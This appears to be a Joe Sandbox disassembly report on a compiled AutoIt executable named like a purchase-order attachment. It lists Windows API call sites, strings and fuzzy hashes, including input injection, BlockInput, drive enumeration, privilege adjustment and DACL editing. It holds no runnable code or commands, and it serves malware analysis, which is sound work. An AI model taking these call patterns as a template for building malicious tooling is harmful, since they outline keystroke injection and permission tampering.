                          • API String ID: 2295610775-0
                          • Opcode ID: ed7dbc95e444be56d654245e36cda454b5ffabc59965f7d99a1d227b68a37c0b
                          • Instruction ID: 8bb79e3a54329c9e9b80c8933b1288558c22bdbb6ae1ee73c94126b46546c673
                          • Opcode Fuzzy Hash: ed7dbc95e444be56d654245e36cda454b5ffabc59965f7d99a1d227b68a37c0b
                          • Instruction Fuzzy Hash: EC11D0716046019FC710DF29C884A26BBE1FF84328F04C69AE5698F2A2CB34EC05DBD1
                          APIs
                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00F84891,?,?,00000035,?), ref: 00F737E4
                          • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00F84891,?,?,00000035,?), ref: 00F737F4
                          Similarity
                          • API ID: ErrorFormatLastMessage
                          • String ID:
                          • API String ID: 3479602957-0
                          • Opcode ID: 6f5bef959cf9be23c7a66e649a924171ef2d17ee4e3a50cd39e8931acfd6ac85
                          • Instruction ID: 91ae3c0b32affaca0f4d9c4d08228837a9aac9666df54149be6295419502752a
                          • Opcode Fuzzy Hash: 6f5bef959cf9be23c7a66e649a924171ef2d17ee4e3a50cd39e8931acfd6ac85
                          • Instruction Fuzzy Hash: 24F0E5B1A082297AEB2017668C4DFEB3BAEEFC4771F004166F509D2281D9609945E6F1
                          APIs
                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00F6B25D
                          • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00F6B270
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: InputSendkeybd_event
                          • String ID:
                          • API String ID: 3536248340-0
                          • Opcode ID: df60fb091217ee8a8906b2c8700a43d228b2b32fcfa1d968ca2f144d86a848c6
                          • Instruction ID: bf6a601f80e5c298e94616d09ea511628320222be26baa7a7cc9d843aaf933b0
                          • Opcode Fuzzy Hash: df60fb091217ee8a8906b2c8700a43d228b2b32fcfa1d968ca2f144d86a848c6
                          • Instruction Fuzzy Hash: 80F06D7180428DABDB058FA0C805BAE7BB0FF04305F00800AF951A5192C3798201AF94
                          APIs
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F611FC), ref: 00F610D4
                          • CloseHandle.KERNEL32(?,?,00F611FC), ref: 00F610E9
                          Similarity
                          • API ID: AdjustCloseHandlePrivilegesToken
                          • String ID:
                          • API String ID: 81990902-0
                          • Opcode ID: 3a3dba0c82b8b3a636ad6aeac82430ce5ff4b002fefce5e69869c9ce12aca078
                          • Instruction ID: 6655a328e6201d3dd54d88481e47540cc27d493c89c35cec7c09fcb49b91ecb4
                          • Opcode Fuzzy Hash: 3a3dba0c82b8b3a636ad6aeac82430ce5ff4b002fefce5e69869c9ce12aca078
                          • Instruction Fuzzy Hash: ABE0BF72418610AEF7252B51FC05EB777A9EB04320F14882EF5A5804B1DB626CE0EB50
                          Strings
                          • Variable is not of type 'Object'., xrefs: 00F50C40
                          Similarity
                          • API ID:
                          • String ID: Variable is not of type 'Object'.
                          • API String ID: 0-1840281001
                          • Opcode ID: 7e9f9c8a2729e6078cc24b57435285c48bf0c130abed3c0c460c64213e9bc4c5
                          • Instruction ID: 56b708def2fb88526ca5a4711fd20bba57c5d72297c41960d5eba8f946c178c3
                          • Opcode Fuzzy Hash: 7e9f9c8a2729e6078cc24b57435285c48bf0c130abed3c0c460c64213e9bc4c5
                          • Instruction Fuzzy Hash: 06329B71900209DBDF14DF90C881BEDB7B5BF05314F248159E906AB2C2DB79AE49FBA1
                          APIs
                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00F36766,?,?,00000008,?,?,00F3FEFE,00000000), ref: 00F36998
                          Similarity
                          • API ID: ExceptionRaise
                          • String ID:
                          • API String ID: 3997070919-0
                          • Opcode ID: 8de7e577ae53b68e200c4e6dc9bff201687e08c407de3a634d6b4f43bb9dcf84
                          • Instruction ID: 65bd1d9f41741756fe622a43343c5dcdfaebef9288a015ab23a509406f049dcc
                          • Opcode Fuzzy Hash: 8de7e577ae53b68e200c4e6dc9bff201687e08c407de3a634d6b4f43bb9dcf84
                          • Instruction Fuzzy Hash: 6CB13C32910609AFDB15CF28C48AB657BE0FF49374F25C658E899CF2A2C735D991DB40
                          Strings
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID: 0-3916222277
                          • Opcode ID: 740492cead35bb2f0fa2d525cf8ac45ca0eaaeed53563e996b8156aa31106b64
                          • Instruction ID: c3979bfbd40a92e8698ac4ea0055ab3d6529fb980410061bcd7e30db7c894976
                          • Opcode Fuzzy Hash: 740492cead35bb2f0fa2d525cf8ac45ca0eaaeed53563e996b8156aa31106b64
                          • Instruction Fuzzy Hash: 57125E71E00229DBDB14CF58C8807EEB7B5FF48710F14819AE949EB251EB349A85EF90
                          APIs
                          • BlockInput.USER32(00000001), ref: 00F7EABD
                          Similarity
                          • API ID: BlockInput
                          • String ID:
                          • API String ID: 3456056419-0
                          • Opcode ID: 7b9a2a649d448c6925a464f967cabf0e02aac6a340decd2a48e9279f415f40c5
                          • Instruction ID: 0b687cc29293766e1248fadbe413a7a5ffd25a97909676f318317d6051d09d66
                          • Opcode Fuzzy Hash: 7b9a2a649d448c6925a464f967cabf0e02aac6a340decd2a48e9279f415f40c5
                          • Instruction Fuzzy Hash: D3E01A322002049FD710EF59D804E9AF7E9AF98760F008457FC49C7291DA74A840ABA1
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00F203EE), ref: 00F209DA
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          Strings
                          Similarity
                          • API ID:
                          • String ID: 0
                          • API String ID: 0-4108050209
                          APIs
                          • DeleteObject.GDI32(00000000), ref: 00F82B30
                          • DeleteObject.GDI32(00000000), ref: 00F82B43
                          • DestroyWindow.USER32 ref: 00F82B52
                          • GetDesktopWindow.USER32 ref: 00F82B6D
                          • GetWindowRect.USER32(00000000), ref: 00F82B74
                          • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00F82CA3
                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00F82CB1
                          • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F82CF8
                          • GetClientRect.USER32(00000000,?), ref: 00F82D04
                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00F82D40
                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F82D62
                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F82D75
                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F82D80
                          • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F82D89
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F82D98
                          • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F82DA1
                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F82DA8
                          • GlobalFree.KERNEL32(00000000), ref: 00F82DB3
                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F82DC5
                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00F9FC38,00000000), ref: 00F82DDB
                          • GlobalFree.KERNEL32(00000000), ref: 00F82DEB
                          • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00F82E11
                          • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00F82E30
                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F82E52
                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F8303F
                          Strings
                          Similarity
                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                          • String ID: $AutoIt v3$DISPLAY$static
                          • API String ID: 2211948467-2373415609
                          APIs
                          • SetTextColor.GDI32(?,00000000), ref: 00F9712F
                          • GetSysColorBrush.USER32(0000000F), ref: 00F97160
                          • GetSysColor.USER32(0000000F), ref: 00F9716C
                          • SetBkColor.GDI32(?,000000FF), ref: 00F97186
                          • SelectObject.GDI32(?,?), ref: 00F97195
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00F971C0
                          • GetSysColor.USER32(00000010), ref: 00F971C8
                          • CreateSolidBrush.GDI32(00000000), ref: 00F971CF
                          • FrameRect.USER32(?,?,00000000), ref: 00F971DE
                          • DeleteObject.GDI32(00000000), ref: 00F971E5
                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00F97230
                          • FillRect.USER32(?,?,?), ref: 00F97262
                          • GetWindowLongW.USER32(?,000000F0), ref: 00F97284
                            • Part of subcall function 00F973E8: GetSysColor.USER32(00000012), ref: 00F97421
                            • Part of subcall function 00F973E8: SetTextColor.GDI32(?,?), ref: 00F97425
                            • Part of subcall function 00F973E8: GetSysColorBrush.USER32(0000000F), ref: 00F9743B
                            • Part of subcall function 00F973E8: GetSysColor.USER32(0000000F), ref: 00F97446
                            • Part of subcall function 00F973E8: GetSysColor.USER32(00000011), ref: 00F97463
                            • Part of subcall function 00F973E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F97471
                            • Part of subcall function 00F973E8: SelectObject.GDI32(?,00000000), ref: 00F97482
                            • Part of subcall function 00F973E8: SetBkColor.GDI32(?,00000000), ref: 00F9748B
                            • Part of subcall function 00F973E8: SelectObject.GDI32(?,?), ref: 00F97498
                            • Part of subcall function 00F973E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00F974B7
                            • Part of subcall function 00F973E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F974CE
                            • Part of subcall function 00F973E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00F974DB
                          Similarity
                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                          • String ID:
                          • API String ID: 4124339563-0
                          APIs
                          • DestroyWindow.USER32(?,?), ref: 00F18E14
                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00F56AC5
                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00F56AFE
                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00F56F43
                            • Part of subcall function 00F18F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F18BE8,?,00000000,?,?,?,?,00F18BBA,00000000,?), ref: 00F18FC5
                          • SendMessageW.USER32(?,00001053), ref: 00F56F7F
                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00F56F96
                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00F56FAC
                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00F56FB7
                          Strings
                          Similarity
                          • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                          • String ID: 0
                          • API String ID: 2760611726-4108050209
                          APIs
                          • DestroyWindow.USER32(00000000), ref: 00F8273E
                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00F8286A
                          • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00F828A9
                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00F828B9
                          • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00F82900
                          • GetClientRect.USER32(00000000,?), ref: 00F8290C
                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00F82955
                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00F82964
                          • GetStockObject.GDI32(00000011), ref: 00F82974
                          • SelectObject.GDI32(00000000,00000000), ref: 00F82978
                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00F82988
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F82991
                          • DeleteDC.GDI32(00000000), ref: 00F8299A
                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00F829C6
                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 00F829DD
                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00F82A1D
                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00F82A31
                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00F82A42
                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00F82A77
                          • GetStockObject.GDI32(00000011), ref: 00F82A82
                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00F82A8D
                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00F82A97
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                          • API String ID: 2910397461-517079104
                          • Opcode ID: f65a1123e15367059b591e848d5d2e24c9d51041f1cd49428f105bab21539f1c
                          • Instruction ID: 37ff2ed1ff8686d5c49bdd85af44a730a8840cf243295ba86dab682fe5a6069c
                          • Opcode Fuzzy Hash: f65a1123e15367059b591e848d5d2e24c9d51041f1cd49428f105bab21539f1c
                          • Instruction Fuzzy Hash: 4DB14B71A00219AFEB14DFA8DC4AFAE7BA9FB48710F004155FA15E72D0D774AD40EBA4
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 00F74AED
                          • GetDriveTypeW.KERNEL32(?,00F9CB68,?,\\.\,00F9CC08), ref: 00F74BCA
                          • SetErrorMode.KERNEL32(00000000,00F9CB68,?,\\.\,00F9CC08), ref: 00F74D36
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ErrorMode$DriveType
                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                          • API String ID: 2907320926-4222207086
                          • Opcode ID: 9fc6180962e49521bc67761bf73c44ae303bf9eba517271b06f58c85ab516374
                          • Instruction ID: ef2b4fef439cc2b0981707db3a860acf3bfa82383a24f336efdd685b3731ebca
                          • Opcode Fuzzy Hash: 9fc6180962e49521bc67761bf73c44ae303bf9eba517271b06f58c85ab516374
                          • Instruction Fuzzy Hash: A1618332A091069BCB15DF18CA82E6977A0AF44315B24C41BF80AEB6D2DB75FD41FB53
                          APIs
                          • GetSysColor.USER32(00000012), ref: 00F97421
                          • SetTextColor.GDI32(?,?), ref: 00F97425
                          • GetSysColorBrush.USER32(0000000F), ref: 00F9743B
                          • GetSysColor.USER32(0000000F), ref: 00F97446
                          • CreateSolidBrush.GDI32(?), ref: 00F9744B
                          • GetSysColor.USER32(00000011), ref: 00F97463
                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F97471
                          • SelectObject.GDI32(?,00000000), ref: 00F97482
                          • SetBkColor.GDI32(?,00000000), ref: 00F9748B
                          • SelectObject.GDI32(?,?), ref: 00F97498
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00F974B7
                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F974CE
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00F974DB
                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F9752A
                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00F97554
                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00F97572
                          • DrawFocusRect.USER32(?,?), ref: 00F9757D
                          • GetSysColor.USER32(00000011), ref: 00F9758E
                          • SetTextColor.GDI32(?,00000000), ref: 00F97596
                          • DrawTextW.USER32(?,00F970F5,000000FF,?,00000000), ref: 00F975A8
                          • SelectObject.GDI32(?,?), ref: 00F975BF
                          • DeleteObject.GDI32(?), ref: 00F975CA
                          • SelectObject.GDI32(?,?), ref: 00F975D0
                          • DeleteObject.GDI32(?), ref: 00F975D5
                          • SetTextColor.GDI32(?,?), ref: 00F975DB
                          • SetBkColor.GDI32(?,?), ref: 00F975E5
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                          • String ID:
                          • API String ID: 1996641542-0
                          • Opcode ID: 6f191a45c6558907378ea1bbd28032e9fb7929b1432c673efe47657076f764c9
                          • Instruction ID: dc4a26fbfa779608e280f4fd51365a1ef2f79f5b9e9884523bf55b85e178bc63
                          • Opcode Fuzzy Hash: 6f191a45c6558907378ea1bbd28032e9fb7929b1432c673efe47657076f764c9
                          • Instruction Fuzzy Hash: 94616E72D00218AFEF119FA4DC49EEE7FB9EB08320F154116F915AB2A1D7759940EF90
                          APIs
                          • GetCursorPos.USER32(?), ref: 00F91128
                          • GetDesktopWindow.USER32 ref: 00F9113D
                          • GetWindowRect.USER32(00000000), ref: 00F91144
                          • GetWindowLongW.USER32(?,000000F0), ref: 00F91199
                          • DestroyWindow.USER32(?), ref: 00F911B9
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00F911ED
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F9120B
                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F9121D
                          • SendMessageW.USER32(00000000,00000421,?,?), ref: 00F91232
                          • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00F91245
                          • IsWindowVisible.USER32(00000000), ref: 00F912A1
                          • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00F912BC
                          • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00F912D0
                          • GetWindowRect.USER32(00000000,?), ref: 00F912E8
                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00F9130E
                          • GetMonitorInfoW.USER32(00000000,?), ref: 00F91328
                          • CopyRect.USER32(?,?), ref: 00F9133F
                          • SendMessageW.USER32(00000000,00000412,00000000), ref: 00F913AA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                          • String ID: ($0$tooltips_class32
                          • API String ID: 698492251-4156429822
                          • Opcode ID: 42f2e417bc7f6ed67c69cef014c74418736520c18d131cd6cb441c829f7e82c1
                          • Instruction ID: 485714efd13273c87e5b8e7e85e7dfb7b0b3b6bcd430f9c9c09cce2acb7903aa
                          • Opcode Fuzzy Hash: 42f2e417bc7f6ed67c69cef014c74418736520c18d131cd6cb441c829f7e82c1
                          • Instruction Fuzzy Hash: 2AB18F71608341AFEB14DF64CC84B6ABBE4FF88354F008919F9999B2A1C771EC44EB91
                          APIs
                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F18968
                          • GetSystemMetrics.USER32(00000007), ref: 00F18970
                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F1899B
                          • GetSystemMetrics.USER32(00000008), ref: 00F189A3
                          • GetSystemMetrics.USER32(00000004), ref: 00F189C8
                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00F189E5
                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00F189F5
                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00F18A28
                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00F18A3C
                          • GetClientRect.USER32(00000000,000000FF), ref: 00F18A5A
                          • GetStockObject.GDI32(00000011), ref: 00F18A76
                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F18A81
                            • Part of subcall function 00F1912D: GetCursorPos.USER32(?), ref: 00F19141
                            • Part of subcall function 00F1912D: ScreenToClient.USER32(00000000,?), ref: 00F1915E
                            • Part of subcall function 00F1912D: GetAsyncKeyState.USER32(00000001), ref: 00F19183
                            • Part of subcall function 00F1912D: GetAsyncKeyState.USER32(00000002), ref: 00F1919D
                          • SetTimer.USER32(00000000,00000000,00000028,00F190FC), ref: 00F18AA8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                          • String ID: AutoIt v3 GUI
                          • API String ID: 1458621304-248962490
                          • Opcode ID: 933ffacf3229792c312b5a9d8e75e04a3bbd73db02267e28d84fea12e8e29e4b
                          • Instruction ID: 69acc854a6dda93e1e7c6a468c3e36cf168412bf0b8dc7de98d12731f9a496b0
                          • Opcode Fuzzy Hash: 933ffacf3229792c312b5a9d8e75e04a3bbd73db02267e28d84fea12e8e29e4b
                          • Instruction Fuzzy Hash: D1B18E31A00209AFDB14DFA8DD55BEE3BB5FB48325F14421AFA15E7290DB34E841EB91
                          APIs
                            • Part of subcall function 00F610F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F61114
                            • Part of subcall function 00F610F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00F60B9B,?,?,?), ref: 00F61120
                            • Part of subcall function 00F610F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00F60B9B,?,?,?), ref: 00F6112F
                            • Part of subcall function 00F610F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00F60B9B,?,?,?), ref: 00F61136
                            • Part of subcall function 00F610F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F6114D
                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F60DF5
                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F60E29
                          • GetLengthSid.ADVAPI32(?), ref: 00F60E40
                          • GetAce.ADVAPI32(?,00000000,?), ref: 00F60E7A
                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F60E96
                          • GetLengthSid.ADVAPI32(?), ref: 00F60EAD
                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00F60EB5
                          • HeapAlloc.KERNEL32(00000000), ref: 00F60EBC
                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F60EDD
                          • CopySid.ADVAPI32(00000000), ref: 00F60EE4
                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F60F13
                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F60F35
                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F60F47
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F60F6E
                          • HeapFree.KERNEL32(00000000), ref: 00F60F75
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F60F7E
                          • HeapFree.KERNEL32(00000000), ref: 00F60F85
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F60F8E
                          • HeapFree.KERNEL32(00000000), ref: 00F60F95
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00F60FA1
                          • HeapFree.KERNEL32(00000000), ref: 00F60FA8
                            • Part of subcall function 00F61193: GetProcessHeap.KERNEL32(00000008,00F60BB1,?,00000000,?,00F60BB1,?), ref: 00F611A1
                            • Part of subcall function 00F61193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00F60BB1,?), ref: 00F611A8
                            • Part of subcall function 00F61193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00F60BB1,?), ref: 00F611B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
